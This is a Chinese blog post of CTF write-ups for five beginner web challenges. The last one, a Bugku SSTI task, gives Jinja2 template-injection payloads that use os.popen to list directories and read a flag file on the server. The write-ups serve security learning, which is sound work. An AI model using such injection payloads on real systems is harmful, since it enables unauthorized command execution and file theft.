CTF练习题WP1

已于 2023-03-25 13:34:18 修改
阅读量600 收藏 5
点赞数 4
分类专栏: CTF 文章标签: 网络安全 web安全
于 2023-03-25 12:46:52 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_73891130/article/details/129765015
版权

 1.CTF-web基础$_POST

(1) 题目:

        $what=$_POST['what'];

        echo $what;

        if($what=='flag')

        echo 'flag{****}';

(2) 解题关键:hackber插件

2、滑稽

解题方法:

直接按F12,查看“body”就能得到flag

3、计算器

发现只能输入一位数

 解题方法:

把maxlength的值改成2、3······(值为几代表能输入的为几位)

 最终输入计算结果得到flag

4、GET

(1) 题目

(2) 解题方法:

直接在ip后加“/?What=flag”

 

5、bugku–Simple_SSLI_2

(1) 题目

 

 (2) 解题方法

分别在IP后加上:

/?{{ config.__class__.__init__.__globals__['os'].popen('ls ../').read() }}

/?{{ config.__class__.__init__.__globals__['os'].popen('ls ../app').read() }}

/?{{ config.__class__.__init__.__globals__['os'].popen('cat ../app/flag').read() }}

m0_73891130
关注
  • 4
    点赞
  • 5
    收藏
    觉得还不错? 一键收藏
  • 3
    评论
专栏目录
CTF练习1
H20180907的博客
06-28 690
练习平台:网络信息安全攻防学习平台 http://hackinglab.cn/index.php 需要登陆以后才能进行操作 点击左边的基础题 一共有12题 T1. 点击过关地址,可得 思路: 除了这行字,没有别的东西,立马联想到使用f12查看源代码(部分电脑使用的是Fn+F12) T2. 思路: 想一下这么短,再加密一次可以得到key,大概是属于什么类型的密码 上面暗示了加密两次的结果等于明文 回转13位,ROT13,简单来说就是:要还原ROT13,只要套用原来使用的加密算法即可,是过去古罗马开发的
CTF-入门练习题
10-30
这个“CTF-入门练习题”很可能包含了一系列这样的挑战,旨在帮助初学者提升在网络安全领域的技能。 【网络攻防】 网络攻防是CTF中的核心部分,涉及攻击者与防御者的对抗。攻击者可能试图寻找系统漏洞,进行SQL注入...
BUUCTF题目Misc部分wp(持续更新)
苦行僧的妖孽日常
11-05 7427
BUUCTF题目Misc部分wp(持续更新)
2023 天使杯CTF --- wp
3tefanie丶zhou的博客
06-03 1206
【人,终究会被年少不可得之物困其一生】
2024年网络安全最新CTF_WP-攻防世界web题解(1),2024年最新这原因我服了
最新发布
2401_84264692的博客
05-07 1140
参考:https://www.cnblogs.com/gradyblog/p/16989750.html查看源码提示source.php并且还提到了一个hint.php,查看提示flag在这个里面先看前面的源码source.phprequest接收参数file,判断是否为空、是否是string、checkfile如果满足,则包含file否则打印滑稽所以应该是要把ffffllllaaaagggg文件包含进file,关键就是怎么绕过checkfile。
2021黑盾杯CTF部分WP
qq_45149716的博客
12-05 5025
一、 Signin 通过观察附件得到附件为一个文本 全由01组成 根据以往的经验来是这个应该是是通过PIL库将01转换为像素点来构造二维码 from PIL import Image MAX = 500 pic = Image.new("RGB", (MAX, MAX)) str="1111...1111" #文档太大所以省略了文档内容" i = 0 for y in range(0, MAX): for x in range(0, MAX): if str[i] == '1':
【第六届强网杯CTF-Wp
qq_45603443的博客
08-02 2448
第六届强网杯全国网络安全挑战赛wp
2022年暑期CTF刷题WP(停止更新)
qq_52820087的博客
06-19 3537
2022年暑期CTF刷题之路
bugku ctf misc wp2.pdf
07-05
bugku ctf misc wp2.pdf
ctf网络安全攻防练习题
12-04
总的来说,这个CTF练习题融合了计算复杂性理论、隐写术、二进制分析和文件格式理解等多个网络安全领域的知识点,旨在挑战和提升参赛者的综合技能。解题过程中,耐心、细致和创新思维是至关重要的。通过这样的练习,...
CtfHub-wpweb
01-23
本文主要探讨了CTF(Capture The Flag)竞赛中与Web安全相关的知识点,通过解决一系列问题,我们可以学习到如何发现和利用网站的漏洞获取关键信息。首先,提到了通过查找网站的备份文件来获取线索,例如在URL后添加...
bugku ctf misc wp.pdf
07-05
bugku ctf misc wp.pdf
ctfshow大部分wp(附带个人整理知识笔记)
ZxC789456302的博客
10-01 6861
WEB信息搜集入门(前10道都是水题,10题后没有水题了)源码中即为flag(签到题)前端js拦截,查看源代码即可,得到flagflag在响应头里面在访问robots.txt,得知存在flagishere.txt文件,访问获得flagphps源码泄露,访问index.phps,下载文件打开得到flag访问www.zip获取配置文件得知在服务器下存在fl000g.txt,线上访问得到flag访问.git(隐藏文件)注意格式为/.git/,得到flag隐藏文件的第二种情况,访问.svn,格式为/.svn/,得到
2023年第七届蓝帽杯半决赛WPCTF&取证)
weixin_63576152的博客
09-18 1445
打开xlsx文件,打开以后,发现没有字,ctrl+a全选,修改你字体颜色,发现有些加粗,有些没加粗,结合题目,应当排序,将每一列从小到大排序,将加粗的单元格改成黑色,将列宽改为2,得到二维码,扫描后得到flag。对SMS.txt的加密逻辑是先AES加密,再base64加密,AES的秘钥在Getkey函数中。base64解码calllog.txt,得到通话记录,搜索10086结果是2条,且都为呼进。Base64、BASE64都是错的,答案格式模糊,而且base64是编码,不是很懂。
上海磐石ctf部分wp
weixin_44807430的博客
05-28 286
磐石wp
CTFWeb反序列wp
毅哥的博客
12-30 263
一道关于反序列法的web题 <?php error_reporting(0); $name=$_GET['name']; $age=$_GET['age']; $pop=$_GET['pop']; if(isset($name) && isset($age)){ $word = unserialize($pop); if($word->cname($name,$age)){ $word->cflag(); }e
CTF-web基础$_POST
三天不打上房揭瓦的博客
08-15 1997
前言:小编也是现学现卖,方便自己记忆,写的不好的地方多多包涵,希望各位大佬多多批评指正。 网址:web基础$_POST 1.进入网址可以看到如下代码。 2.分析该代码,得出只需要传 what参数等于flag即可得出答案。即和GET代码原理一样。 $what=$_POST['what']; echo $what; if($what=='flag') echo 'flag{****}'; 3.这里使用一个小插件来通过此关。hackber 火狐浏览器可以添加的插件,通过hackber来获取到 flag,最终答
ctf(vip限免)WP
qq_62517352的博客
04-09 3311
源码泄露 看题就是要我们看源码,在浏览器里 Ctrl + U 直接查看网页源码,这里也是可以直接看到flag 前台JS绕过 这个题就是不能用F12进行查看源码了,我们的 Ctrl + U 还是可以用的,直接可以得到flag 协议头信息泄露 题目提示要我们抓包,那就抓,抓完这样,什么也没看到 上网搜搜原来是要查看响应头,才能得到flag,记录一下查看步骤,一免以后忘记 先点图示位置 这里点击 Repeater 再点 Go ,就可以在右边看到flag robots后台泄露 robots之前做过,就是在
CTF-Web(Post)
Zhang_hongchao的博客
01-25 955
题目:打开网址后显示以下内容: $what=$_POST['what']; echo $what; if($what=='flag') echo 'flag{****}'; 使用POST请求可以直接获取flag。 python代码: payload=dict(what='flag') r=requests.post('http://114.67.246.176:16179',data=payload) print(r.text) 可以直接获取flag为 flagflag{13c5f0c1a1a2.
ctfhub 全部WP
09-22
引用:MIME((Multipurpose Internet Mail ...由于ctfhub是一个综合性的CTF平台,涵盖了大量的题目和解题思路,每个题目的WP都有着不同的内容和解法。如果您对特定的题目或解题方法感兴趣,我可以为您提供更多信息。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 3
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值